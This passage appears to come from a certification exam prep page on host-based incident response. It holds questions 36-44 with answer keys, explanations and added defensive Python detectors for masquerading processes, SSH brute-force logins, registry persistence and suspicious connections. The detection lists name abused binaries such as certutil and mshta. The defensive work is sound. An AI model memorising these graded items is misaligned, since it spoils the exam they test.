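modelled on the exhibit of question 25; every entry in SAMPLE_REPORT is constructed.
"""
import json
import re
from typing import Dict, List

# The mechanism follows from the key path or file location, never from the
# value name: "MaliciousService" under ...\Run is still a Run-key entry.
RUN_KEY_RE = re.compile(
    r"^(HKLM|HKCU|HKEY_LOCAL_MACHINE|HKEY_CURRENT_USER)\\"
    r"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)$",
    re.IGNORECASE,
)
SERVICES_KEY_RE = re.compile(
    r"^(HKLM|HKEY_LOCAL_MACHINE)\\SYSTEM\\(CurrentControlSet|ControlSet\d{3})"
    r"\\Services\\[^\\]+$",
    re.IGNORECASE,
)
STARTUP_FOLDER_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
TASKS_FOLDER_RE = re.compile(r"\\Windows\\System32\\Tasks\\", re.IGNORECASE)
# Directories a standard user can write to; a payload here deserves a closer look.
USER_WRITABLE_RE = re.compile(r"\\(Users|Temp|ProgramData|AppData)\\", re.IGNORECASE)


def classify(artifact: Dict) -> str:
    """Name the persistence mechanism from where the artifact lives."""
    kind = artifact.get("Type", "").lower()
    if kind == "registry":
        key = artifact.get("Key", "")
        if RUN_KEY_RE.match(key):
            return "Registry Run Key"
        if SERVICES_KEY_RE.match(key):
            return "Windows Service"
        return "Unknown registry location"
    if kind == "file":
        path = artifact.get("Path", "")
        if STARTUP_FOLDER_RE.search(path):
            return "Startup Folder"
        if TASKS_FOLDER_RE.search(path):
            return "Scheduled Task"
        return "Unknown file location"
    return "Scheduled Task" if kind == "scheduledtask" else "Unknown"


def executable_path(command: str) -> str:
    """Return the executable part of a command line, honouring quoted paths."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    m = re.match(r"^(.+?\.(?:exe|dll|ps1|bat|cmd|vbs|js))(?:\s|$)", command, re.IGNORECASE)
    return m.group(1) if m else command.split(" ")[0]


def payload_of(artifact: Dict) -> str:
    """Extract the executable the persistence entry will launch."""
    kind = artifact.get("Type", "").lower()
    if kind == "registry":
        return executable_path(artifact.get("Value", ""))
    if kind == "file":
        return artifact.get("Target") or artifact.get("Path", "")
    return executable_path(artifact.get("Action", "")) if kind == "scheduledtask" else ""


def analyze_report(report_json: str) -> List[Dict]:
    """One finding per artifact: mechanism, payload path and a suspicion flag."""
    findings = []
    for artifact in json.loads(report_json).get("Artifacts", []):
        payload = payload_of(artifact)
        findings.append({"mechanism": classify(artifact), "payload": payload,
                         "suspicious": bool(USER_WRITABLE_RE.search(payload))})
    return findings


# Constructed report: one entry per mechanism, plus a benign service for contrast.
SAMPLE_REPORT = json.dumps({"Host": "WS-FIN-07", "Artifacts": [
    {"Type": "Registry", "Key": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
     "ValueName": "MaliciousService", "Value": "C:\\Users\\malware\\app.exe"},
    {"Type": "Registry", "Key": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinHlpSvc",
     "ValueName": "ImagePath", "Value": "C:\\Windows\\Temp\\svchost.exe"},
    {"Type": "File", "Path": "C:\\Users\\financeuser\\AppData\\Roaming\\Microsoft\\Windows"
                             "\\Start Menu\\Programs\\Startup\\update.lnk",
     "Target": "C:\\Users\\financeuser\\AppData\\Roaming\\Microsoft\\svchost.exe"},
    {"Type": "ScheduledTask", "Name": "UpdateTask", "RunAs": "SYSTEM",
     "Action": "C:\\ProgramData\\.hidden\\run.ps1"},
    {"Type": "Registry", "Key": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\Dhcp",
     "ValueName": "ImagePath", "Value": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
]})

if __name__ == "__main__":
    for f in analyze_report(SAMPLE_REPORT):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{f['mechanism']:<18} {flag:<10} {f['payload']}")
```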

36
Multi-Select · hard

An analyst is investigating a host that is suspected of being compromised. The host's security logs show multiple failed login attempts followed by a successful login from an unusual IP address, and then a series of outbound connections to known malicious destinations. Which TWO actions should the analyst take immediately? (Choose two.)

Select 2 answers
A. Delete the malicious files found on the host
B. Isolate the host from the network
C. Collect a forensic image of the host's hard drive
D. Reboot the host to clear any malware from memory
E. Run a full antivirus scan on the host
Answers: B, C

Isolating the host stops ongoing malicious activity and prevents lateral movement.

Why this answer

Option B is correct because isolating the host from the network immediately stops the outbound connections to known malicious destinations, preventing further data exfiltration, lateral movement, or command-and-control (C2) communication. This containment step is critical in incident response to limit the blast radius before any other investigative or remediation actions are taken. Option C is correct because collecting a forensic image preserves the on-disk evidence (malicious files, logs, persistence artifacts) before any remediation alters or destroys it, so the investigation can proceed without loss of evidence.

Exam trap

Cisco often tests the misconception that immediate remediation (deleting files, running antivirus) is the priority, when in fact containment (isolation) and evidence preservation (forensic imaging) are the correct first steps in a structured incident response process.

37
MCQ · medium

During a host-based investigation, an analyst finds a process named 'svchost.exe' consuming high CPU. The process path is 'C:\Windows\Temp\svchost.exe'. What should the analyst conclude?

A. It is a legitimate Windows service host process
B. It is a third-party application that requires investigation
C. It is likely malware disguised as a legitimate process
D. It is a temporary file created by Windows Update
Answer: C

Malware often uses common names in non-standard locations to evade detection.

Why this answer

The legitimate svchost.exe (Service Host) lives in C:\Windows\System32 (with a 32-bit copy in C:\Windows\SysWOW64 on 64-bit systems), is signed by Microsoft and is always started by services.exe. A copy in C:\Windows\Temp is none of those things: Temp is writable by ordinary users, which makes it a common drop location for malware that borrows a system process name to blend into process listings. High CPU usage on its own proves nothing, but combined with the anomalous path it points strongly to malicious activity.

Exam trap

Cisco often tests the misconception that any process named 'svchost.exe' is automatically legitimate; the trap is that the file path (and, on a live system, the parent process and the digital signature) is the critical differentiator, because malware frequently reuses the name of a trusted system binary while running from a location the genuine binary never runs from.

How to eliminate wrong answers

Option A is wrong because the genuine svchost.exe is located in C:\Windows\System32 (or SysWOW64), not C:\Windows\Temp; a svchost.exe running from a user-writable directory is not the Windows Service Host. Option B is wrong because, although third-party applications can run from Temp, the name 'svchost.exe' is chosen precisely to impersonate a Windows system process, which makes malware far more likely than a benign third-party app. Option D is wrong because Windows Update does not create svchost.exe in the Temp directory; it runs from trusted binaries in System32 and its temporary files carry different names (for example .tmp files under C:\Windows\Temp or the C:\Windows\SoftwareDistribution folder).
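The name, path and parent checks described above, as an added example that is not part of this page or of any exam exhibit. It runs over a constructed process snapshot (PIDs, parent PIDs and paths are invented) of the kind Process Explorer or Get-Process would give you, and also catches look-alike names such as svch0st.exe. The expected-parent table is a deliberately short assumption; extend it from your own baseline.

```python
import ntpath

# Constructed process snapshot (pid, parent pid, name, image path) standing in
# for what Process Explorer, tasklist or Get-Process would show on the live host.
PROCESSES = [
    {"pid": 4,    "ppid": 0,    "name": "System",       "path": ""},
    {"pid": 600,  "ppid": 500,  "name": "wininit.exe",  "path": r"C:\Windows\System32\wininit.exe"},
    {"pid": 700,  "ppid": 600,  "name": "services.exe", "path": r"C:\Windows\System32\services.exe"},
    {"pid": 800,  "ppid": 600,  "name": "lsass.exe",    "path": r"C:\Windows\System32\lsass.exe"},
    {"pid": 900,  "ppid": 700,  "name": "svchost.exe",  "path": r"C:\Windows\System32\svchost.exe"},
    {"pid": 3100, "ppid": 2900, "name": "explorer.exe", "path": r"C:\Windows\explorer.exe"},
    {"pid": 1420, "ppid": 3100, "name": "svchost.exe",  "path": r"C:\Windows\Temp\svchost.exe"},
    {"pid": 2200, "ppid": 3100, "name": "svch0st.exe",  "path": r"C:\Users\Public\svch0st.exe"},
]

# Directories the genuine copies of these binaries live in (lower-cased for comparison).
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# System binaries malware likes to impersonate, with the parent each one is
# started by on a healthy Windows host (assumed baseline; extend from your own).
EXPECTED_PARENT = {
    "svchost.exe": "services.exe",
    "lsass.exe": "wininit.exe",
}


def edit_distance(a, b):
    """Levenshtein distance, used to catch look-alike names such as svch0st.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_masquerading(processes):
    """Return [(pid, [reasons])] for processes that fail the name/path/parent checks."""
    by_pid = {p["pid"]: p for p in processes}
    findings = []
    for p in processes:
        name = p["name"].lower()
        reasons = []
        if name in EXPECTED_PARENT:
            directory = ntpath.dirname(p["path"]).lower()
            if directory not in SYSTEM_DIRS:
                reasons.append(f"image path {p['path']} is outside the Windows system directories")
            parent = by_pid.get(p["ppid"])
            parent_name = parent["name"].lower() if parent else "<exited or unknown>"
            if parent_name != EXPECTED_PARENT[name]:
                reasons.append(f"parent is {parent_name} (PID {p['ppid']}), expected {EXPECTED_PARENT[name]}")
        else:
            # A name one edit away from a system binary is a classic typosquat.
            for known in EXPECTED_PARENT:
                if edit_distance(name, known) == 1:
                    reasons.append(f"name is one character away from {known}")
        if reasons:
            findings.append((p["pid"], reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in find_masquerading(PROCESSES):
        print(f"PID {pid}:")
        for reason in reasons:
            print("   ", reason)
```

On a live host the same three checks map onto Process Explorer columns (Path, Parent, Verified Signer); the script only encodes the reasoning so it can be run over an exported snapshot.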

38
MCQmedium

Refer to the exhibit. A host-based analyst reviews auth.log. What does the accepted password log entry indicate?

A.The root account was successfully compromised
B.The system prevented a brute-force attack on the admin account
C.The admin login is legitimate because it was accepted
D.The admin account was accessed by an attacker after brute-forcing root
AnswerD

The same IP tried root repeatedly and then succeeded with admin, which points to password guessing rather than a legitimate login.

Why this answer

The exhibit contains both 'Failed password for root from 10.10.10.10 port 22 ssh2' entries and an 'Accepted password for admin from 10.10.10.10 port 22 ssh2' entry, all from the same source. Read together, the sequence describes an attacker who hammered the root account, failed, and then obtained a session as admin, either by guessing its password or by trying a credential that happened to work; the shared source IP is what ties the failed and successful entries into a single attack. Option D captures this: the admin account was accessed by an attacker after the brute-force attempts against root.

Exam trap

Cisco often tests the trap that 'Accepted password' automatically implies a legitimate user; in host-based analysis the surrounding entries give it meaning, so candidates must correlate the failed attempts from the same source with the eventual success rather than evaluating the accepted entry in isolation.

How to eliminate wrong answers

Option A is wrong because the log shows only 'Failed password for root' entries: root was attacked but not compromised. Option B is wrong because nothing in the log shows the system blocking anything; the admin login was accepted, which is a successful authentication, not a prevented one. Option C is wrong because an accepted login is not automatically legitimate: an attacker who guessed or stole a valid credential produces exactly the same entry, and the failed root attempts from the same source IP are what expose the intent.
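The correlation described above written as detection logic, added here as an example; it is not part of the exhibit or of this page. It runs over a constructed auth.log excerpt (hostnames, PIDs and client ports are invented), groups sshd entries by source IP, and reports any source that failed several times and then got an accepted login. The threshold of three failures is an arbitrary assumption.

```python
import re
from collections import defaultdict

# Constructed auth.log excerpt (sshd on a Debian-style host). The port in each
# line is the client's source port. Not taken from the exhibit.
AUTH_LOG = """\
Mar  3 10:13:52 web01 sshd[2210]: Failed password for root from 10.10.10.10 port 51612 ssh2
Mar  3 10:13:55 web01 sshd[2210]: Failed password for root from 10.10.10.10 port 51612 ssh2
Mar  3 10:13:58 web01 sshd[2210]: Failed password for root from 10.10.10.10 port 51612 ssh2
Mar  3 10:14:02 web01 sshd[2213]: Failed password for invalid user oracle from 10.10.10.10 port 51618 ssh2
Mar  3 10:14:09 web01 sshd[2219]: Accepted password for admin from 10.10.10.10 port 51630 ssh2
Mar  3 10:14:09 web01 sshd[2219]: pam_unix(sshd:session): session opened for user admin by (uid=0)
Mar  3 10:20:31 web01 sshd[2290]: Accepted publickey for deploy from 10.0.0.5 port 40122 ssh2
Mar  3 10:31:10 web01 sshd[2310]: Failed password for alice from 10.0.0.7 port 40410 ssh2
Mar  3 10:31:17 web01 sshd[2310]: Accepted password for alice from 10.0.0.7 port 40410 ssh2
"""

# Matches both password and public-key outcomes; "invalid user" is what sshd
# prints when the account does not exist at all.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<outcome>Accepted|Failed) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def analyze(log_text):
    """Per source IP: failures seen before the first accepted login, users tried, accepted users."""
    state = defaultdict(lambda: {"failed_before": 0, "failed_users": set(), "accepted": []})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        s = state[m["ip"]]
        if m["outcome"] == "Failed":
            s["failed_users"].add(m["user"])
            if not s["accepted"]:
                s["failed_before"] += 1
        else:
            s["accepted"].append(m["user"])
    return state


def suspicious_logins(state, threshold=3):
    """Sources that failed at least `threshold` times and then got an accepted login."""
    hits = []
    for ip, s in state.items():
        if s["accepted"] and s["failed_before"] >= threshold:
            hits.append({"ip": ip, "failures": s["failed_before"],
                         "tried": sorted(s["failed_users"]), "accepted_as": s["accepted"]})
    return hits


if __name__ == "__main__":
    for hit in suspicious_logins(analyze(AUTH_LOG)):
        print(f"{hit['ip']}: {hit['failures']} failures against {hit['tried']}, "
              f"then logged in as {hit['accepted_as']}")
```

A user who mistypes a password once and then succeeds (10.0.0.7 above) stays below the threshold, which is the point of counting failures per source rather than alerting on every accepted login.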

39
MCQmedium

An analyst needs to collect volatile data from a live host before performing a memory dump. Which data is most volatile?

A.Registry data
B.Network connections
C.File system metadata
D.Event logs
AnswerB

Network state changes with every packet, making it highly volatile.

Why this answer

Network connections are the most volatile of the listed data because they change as packets flow and sessions are established or torn down. In live response, the current state of TCP/UDP connections (for example from netstat -ano) is lost the instant the system is powered off or the network cable is pulled, which makes it far more ephemeral than registry data, file system metadata or event logs, all of which are backed by files on disk.

Exam trap

Cisco often tests the order of volatility (RFC 3227) by making candidates confuse persistent disk-based data (registry, logs, file metadata) with transient memory-based data; the trap is assuming that any system artifact is equally volatile, when among the listed options the network connection table is the most ephemeral and must be collected first.

How to eliminate wrong answers

Option A is wrong because registry hives are backed by files on disk (NTUSER.DAT, SYSTEM, SOFTWARE and so on), so their contents survive a power-off even though individual values change at runtime; that makes them less volatile than active network connections. Option C is wrong because file system metadata (timestamps, permissions, MFT records) is stored on disk and remains stable until a file is modified, so it is not as transient as network state. Option D is wrong because event logs are written to disk and persist across reboots, so they are far less volatile than the live connection table.

40
Multi-Selecthard

An analyst is examining the Windows Registry on a host suspected of persistence via a malicious service. Which two registry keys are most relevant to investigate?

Select 2 answers
A.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
B.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
C.HKEY_CLASSES_ROOT\exefile\shell\open\command
D.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
E.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
AnswersA, D

The Services key lists every registered service; the HKLM Run key lists programs started at every logon.

Why this answer

Option A is correct because the Services key under CurrentControlSet lists all registered Windows services, including their executable paths and startup types. Malicious services register here to start automatically with the system, so the analyst compares each service's ImagePath value (and, for svchost-hosted services, the ServiceDll value under the service's Parameters subkey) and its Start value against a known-good baseline to spot suspicious names, image paths or startup configurations. Option D is also correct because HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run is the machine-wide autorun key that launches its entries at every user logon; attackers who cannot or do not register a service commonly fall back on it, so the two keys together cover the most common machine-level persistence paths.

Exam trap

Cisco often tests the distinction between service persistence (Services key) and other autorun mechanisms (Run, RunOnce, AppInit_DLLs), so candidates may confuse the Services key with the Run key or other startup locations. Option B (the per-user RunOnce key) runs an entry once for one user, option C (exefile\shell\open\command) is a file-handler hijack, and option E (the Windows NT\CurrentVersion\Windows key, home of AppInit_DLLs) loads a DLL into processes that load user32.dll; all are persistence mechanisms, but none of them registers a service.
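A triage of the two keys named in this question, added here as an example (not the page's own material). It parses the text that reg.exe prints for `reg query HKLM\SYSTEM\CurrentControlSet\Services /s` and `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`, which lets it run offline on an export from the suspect host; the output below is constructed, including the planted WinDefendUpd service and Updater Run entry. The trusted-directory list and the environment-variable expansion are simplifying assumptions (a real host has more trusted locations and more variables).

```python
import re

# Constructed excerpt of `reg query ... /s` output in the four-space-separated
# format reg.exe prints. Not from a real host.
REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp
    DisplayName    REG_SZ    @%SystemRoot%\system32\dhcpcore.dll,-100
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted -p
    Start    REG_DWORD    0x2
    Type    REG_DWORD    0x20

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\system32\dhcpcore.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VendorAgent
    ImagePath    REG_EXPAND_SZ    "C:\Program Files\Vendor\agent.exe" --service
    Start    REG_DWORD    0x2
    Type    REG_DWORD    0x10

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefendUpd
    DisplayName    REG_SZ    Windows Defender Update Service
    ImagePath    REG_EXPAND_SZ    C:\Windows\Temp\svchost.exe -k netsvcs
    Start    REG_DWORD    0x2
    Type    REG_DWORD    0x10

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Updater    REG_SZ    "C:\Users\Public\Libraries\upd.exe" -s
"""

SERVICES_PREFIX = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services" + "\\"
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Assumed set of directories an autostart executable may legitimately live in.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")
START_TYPES = {"0x0": "boot", "0x1": "system", "0x2": "auto", "0x3": "manual", "0x4": "disabled"}


def parse_reg_query(text):
    """Map each key path to {value name: data} from reg.exe's text output."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
        elif current is not None:
            parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)  # name, type, data
            if len(parts) == 3:
                keys[current][parts[0]] = parts[2]
    return keys


def executable_of(command):
    """First token of a command line, with %SystemRoot%/%windir% expanded and quotes stripped."""
    cmd = re.sub(r"%(systemroot|windir)%", lambda m: r"C:\Windows", command.strip(), flags=re.I)
    if cmd.startswith('"'):
        return cmd[1:cmd.index('"', 1)]
    return cmd.split(" ")[0]


def is_trusted(path):
    return path.lower().startswith(TRUSTED_DIRS)


def suspicious_services(keys):
    """(service, executable, start type) for services whose binary is outside trusted dirs."""
    hits = []
    for key, values in keys.items():
        if not key.startswith(SERVICES_PREFIX) or "ImagePath" not in values:
            continue
        name = key[len(SERVICES_PREFIX):]
        if "\\" in name:  # Parameters and other subkeys are not services themselves
            continue
        exe = executable_of(values["ImagePath"])
        if not is_trusted(exe):
            hits.append((name, exe, START_TYPES.get(values.get("Start", ""), "unknown")))
    return hits


def suspicious_run_entries(keys):
    """(value name, executable) for Run entries whose binary is outside trusted dirs."""
    return [(name, executable_of(data)) for name, data in keys.get(RUN_KEY, {}).items()
            if not is_trusted(executable_of(data))]


if __name__ == "__main__":
    parsed = parse_reg_query(REG_OUTPUT)
    print("services:", suspicious_services(parsed))
    print("run entries:", suspicious_run_entries(parsed))
```

A path check is only the first filter: a service whose ImagePath is the genuine svchost.exe can still be malicious if its Parameters\ServiceDll points at an unknown DLL, so the ServiceDll values deserve the same treatment.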

41
MCQmedium

A security analyst is investigating a host that is suspected of being used as a pivot point in a network intrusion. The analyst needs to identify which process initiated an outbound connection to a known malicious IP address. Which host-based analysis approach should the analyst use to correlate the network connection to the specific process?

A.Run 'netstat -b' on the Windows host to display active connections with the associated process executable.
B.Examine the Windows Firewall log to see the source and destination IP addresses and ports for outbound traffic.
C.Review Windows Security Event Log for Event ID 4688 (Process Creation) for the timeline of process starts.
D.Use PowerShell cmdlet 'Get-NetTCPConnection' to list current TCP connections and their states.
AnswerA

The -b flag shows the binary involved in creating each connection, directly correlating the connection to the process.

Why this answer

Running 'netstat -b' (in practice 'netstat -bno', which adds numeric addresses and the owning PID) from an elevated prompt on a Windows host displays each active connection together with the name of the executable that created it. This directly correlates the outbound connection to the malicious IP with the specific process, which is exactly what the analyst needs in order to identify the pivot point.

Exam trap

Cisco often tests the distinction between network-level logs (firewall logs) and host-level process-to-connection correlation, and the trap here is that candidates may choose 'Get-NetTCPConnection' (Option D) because it lists connections, but they overlook that it does not show the associated process executable without additional scripting.

How to eliminate wrong answers

Option B is wrong because the Windows Firewall log records source/destination IPs and ports but does not associate traffic with a specific process executable; it only logs network-level metadata. Option C is wrong because Event ID 4688 logs process creation events but does not include network connection details, so on its own it cannot tie a specific outbound connection to a process. Option D is wrong because 'Get-NetTCPConnection' lists TCP connections and their states and exposes only the owning PID (OwningProcess); turning that into an executable name requires a second lookup with Get-Process, so it does not give the direct process-to-connection mapping that -b prints.

42
MCQmedium

An analyst is examining a Linux host suspected of being compromised. The file /etc/passwd shows unusual entries. Which host-based analysis tool is best for verifying if the accounts are actively being used?

A.lsof tool
B.ps aux command
C.last command output
D.auditd logs
AnswerC

last reads /var/log/wtmp and shows login sessions, indicating active use.

Why this answer

The `last` command reads the /var/log/wtmp file to display a list of all users who have logged in and out, including their login times, source hosts and durations. Since the question asks whether suspicious accounts from /etc/passwd are actively being used, `last` directly shows recent login activity, making it the best tool for verification. Because an attacker with root can truncate or edit wtmp, corroborate what `last` reports against `lastlog` and the authentication log before concluding that an account has never been used.

Exam trap

Cisco often tests the distinction between tools that show current state (like `ps` or `lsof`) versus tools that show historical activity (like `last`), trapping candidates who confuse 'active processes' with 'active user accounts'.

How to eliminate wrong answers

Option A is wrong because `lsof` lists open files and network connections, not user login history; it cannot show whether an account has logged in. Option B is wrong because `ps aux` shows currently running processes, not historical or recent login sessions; an account could be active without a running process. Option D is wrong because `auditd` logs system calls and security events but requires pre-configured rules to track logins; it is not a simple, immediate command to check active account usage like `last`.
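The cross-check this question describes, added here as an example rather than page material: parse a constructed /etc/passwd and a constructed `last` output, keep only accounts that can log in interactively, and report each one's login history together with the anomalies a reviewer looks for (a second UID 0 account, an account with no wtmp record). Account names, hosts and times are invented; the planted anomaly is the 'sysadm' account.

```python
# Constructed /etc/passwd and `last` output for an illustrative host; the
# duplicate-UID-0 account "sysadm" is the planted anomaly.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
admin:x:1000:1000:admin:/home/admin:/bin/bash
sysadm:x:0:0::/home/sysadm:/bin/bash
svc_backup:x:1001:1001::/var/backups:/bin/sh
"""

LAST_OUTPUT = """\
admin    pts/1        10.10.10.10      Sun Mar  3 10:14   still logged in
admin    pts/0        10.0.0.7         Fri Mar  1 09:12 - 09:40  (00:28)
root     tty1                          Fri Mar  1 08:02 - 08:30  (00:28)
reboot   system boot  5.15.0-97-generic Fri Mar  1 08:00   still running

wtmp begins Thu Feb  1 00:00:01 2024
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
WEEKDAYS = {"Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"}


def parse_passwd(text):
    accounts = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":")
        accounts.append({"name": name, "uid": int(uid), "gid": int(gid), "home": home, "shell": shell})
    return accounts


def parse_last(text):
    """Map user -> list of {tty, host, when} session records from `last` output."""
    history = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] in ("reboot", "shutdown", "wtmp"):
            continue
        user, tty = fields[0], fields[1]
        # Console logins have an empty host column, so the weekday is the third field.
        if fields[2] in WEEKDAYS:
            host, when = "", " ".join(fields[2:6])
        else:
            host, when = fields[2], " ".join(fields[3:7])
        history.setdefault(user, []).append({"tty": tty, "host": host, "when": when})
    return history


def accounts_to_review(passwd_text, last_text):
    """Interactive accounts with login counts, source hosts and review flags."""
    history = parse_last(last_text)
    report = []
    for acct in parse_passwd(passwd_text):
        if acct["shell"] in NOLOGIN_SHELLS:
            continue
        flags = []
        if acct["uid"] == 0 and acct["name"] != "root":
            flags.append("UID 0 but not root")
        sessions = history.get(acct["name"], [])
        if not sessions:
            flags.append("no login in wtmp")  # absence of a record, not proof of non-use
        report.append({"name": acct["name"], "uid": acct["uid"], "logins": len(sessions),
                       "hosts": sorted({s["host"] for s in sessions if s["host"]}), "flags": flags})
    return report


if __name__ == "__main__":
    for row in accounts_to_review(PASSWD, LAST_OUTPUT):
        print(f"{row['name']:<12} uid={row['uid']:<5} logins={row['logins']} "
              f"hosts={row['hosts']} {' | '.join(row['flags'])}")
```

'no login in wtmp' is deliberately worded as an absence of evidence: wtmp rotates and can be wiped, so an account flagged this way still needs a look at lastlog, the authentication log and the home directory.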

43
Multi-Selectmedium

A security analyst is investigating a host that may have been compromised via a drive-by download. Which three indicators of compromise should the analyst look for in the host's logs and artifacts?

Select 3 answers
A.Unusual outbound network connections
B.Modified system files in %SystemRoot%\System32
C.A new user account added to the local Administrators group
D.A large number of 404 errors in the web server log
E.Presence of a scheduled task that runs an unknown executable
AnswersA, B, E

Malware often communicates with C2 servers.

Why this answer

A drive-by download typically exploits a browser or plugin vulnerability to silently execute code on the host. Once compromised, the malware usually establishes command-and-control (C2) communication, which shows up as unusual outbound network connections to suspicious IP addresses or domains, often on non-standard ports (for example TCP 4444 or 8080); reviewing netstat output or host firewall logs for unexpected outbound traffic is therefore a primary indicator (Option A). Option B, modified system files in %SystemRoot%\System32, indicates that the payload tampered with or replaced trusted binaries, which is verified by comparing hashes and digital signatures against a known-good baseline. Option E, a scheduled task that runs an unknown executable, is one of the most common ways a drive-by payload survives a reboot, so the task library and its backing XML files in %SystemRoot%\System32\Tasks belong on the checklist.

Exam trap

Cisco often tests the distinction between host-based and network-based indicators, and the trap here is that candidates confuse web server logs (network-based) with host-based artifacts, or they assume that any post-exploitation action like adding an admin user is a direct indicator of the initial compromise vector rather than a later persistence step.

44
MCQhard

Refer to the exhibit. A security analyst is analyzing a Windows host that is communicating with an external server at 192.168.1.50. Based on the output, which process is likely malicious?

A.svchost.exe (PID 1420) because it is connecting to an external IP on port 80.
B.cmd.exe (PID 2568) because it could be used to launch other processes.
C.powershell.exe (PID 2792) because it has an established HTTPS connection to an external server.
D.notepad.exe (PID 2344) because it is not expecting to make any network connections.
AnswerC

PowerShell making an outbound HTTPS connection is atypical and often used for malicious purposes.

Why this answer

PowerShell.exe (PID 2792) is the likely malicious process because it has an established HTTPS connection (TCP port 443) to the server at 192.168.1.50 (which the exhibit treats as external even though it is an RFC 1918 address; the reasoning is the same for any destination the host has no business talking to). PowerShell is a powerful scripting tool that attackers abuse to execute arbitrary code, download payloads and run command-and-control (C2) channels over encrypted HTTPS, which hides the content from signature-based network tools; an interactive scripting host holding an outbound TLS session is rarely normal on a workstation.

Exam trap

Cisco often tests the misconception that any process connecting to an external IP is malicious; the trap is that candidates overlook the context of the process. PowerShell is a legitimate tool that is frequently abused, whereas svchost.exe making HTTP connections is normal system behavior, provided it is the genuine System32 binary started by services.exe.

How to eliminate wrong answers

Option A is wrong because svchost.exe (PID 1420) connecting out on port 80 is normal for Windows services that perform HTTP-based updates or telemetry, provided the binary is the genuine one in System32; on the evidence in the exhibit it is the least suspicious candidate. Option B is wrong because cmd.exe (PID 2568) could be used to launch other processes, but the exhibit shows no network connection or other suspicious activity from it. Option D is wrong because, although notepad.exe (PID 2344) has no reason to make network connections, the exhibit shows none from it, so there is no evidence of malicious activity from that process.
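The process-to-connection correlation that questions 41 and 44 turn on, as an added example that is not part of either exhibit. It parses the text 'netstat -bno' prints from an elevated prompt (the owning image appears in brackets on the line after each connection, preceded by the service name for svchost-hosted services, or by 'Can not obtain ownership information' for kernel-owned sockets), filters the connections to a given destination, and flags established sessions owned by images that should not normally talk out. The netstat output, addresses and PIDs are constructed, and the list of unexpected images is an assumed starting point.

```python
import re

# Constructed `netstat -bno` output (elevated prompt) mirroring the kind of
# exhibit in questions 41 and 44; addresses and PIDs are invented.
NETSTAT_OUTPUT = """\

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.0.23:49701        192.168.1.50:80        ESTABLISHED     1420
  WinHttpAutoProxySvc
 [svchost.exe]
  TCP    10.0.0.23:49712        192.168.1.50:443       ESTABLISHED     2792
 [powershell.exe]
  TCP    10.0.0.23:49733        10.0.0.9:445           ESTABLISHED     4
 Can not obtain ownership information
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  RpcSs
 [svchost.exe]
  UDP    0.0.0.0:5353           *:*                                    1760
 [chrome.exe]
"""

# TCP lines carry a state column, UDP lines do not; the PID is always last.
CONN_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")

# Assumed list of images that have no routine reason to hold outbound sessions.
UNEXPECTED_NETWORK_IMAGES = {
    "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "notepad.exe", "calc.exe",
}


def parse_netstat_b(text):
    """Turn netstat -bno output into records with the owning image and service components."""
    conns = []
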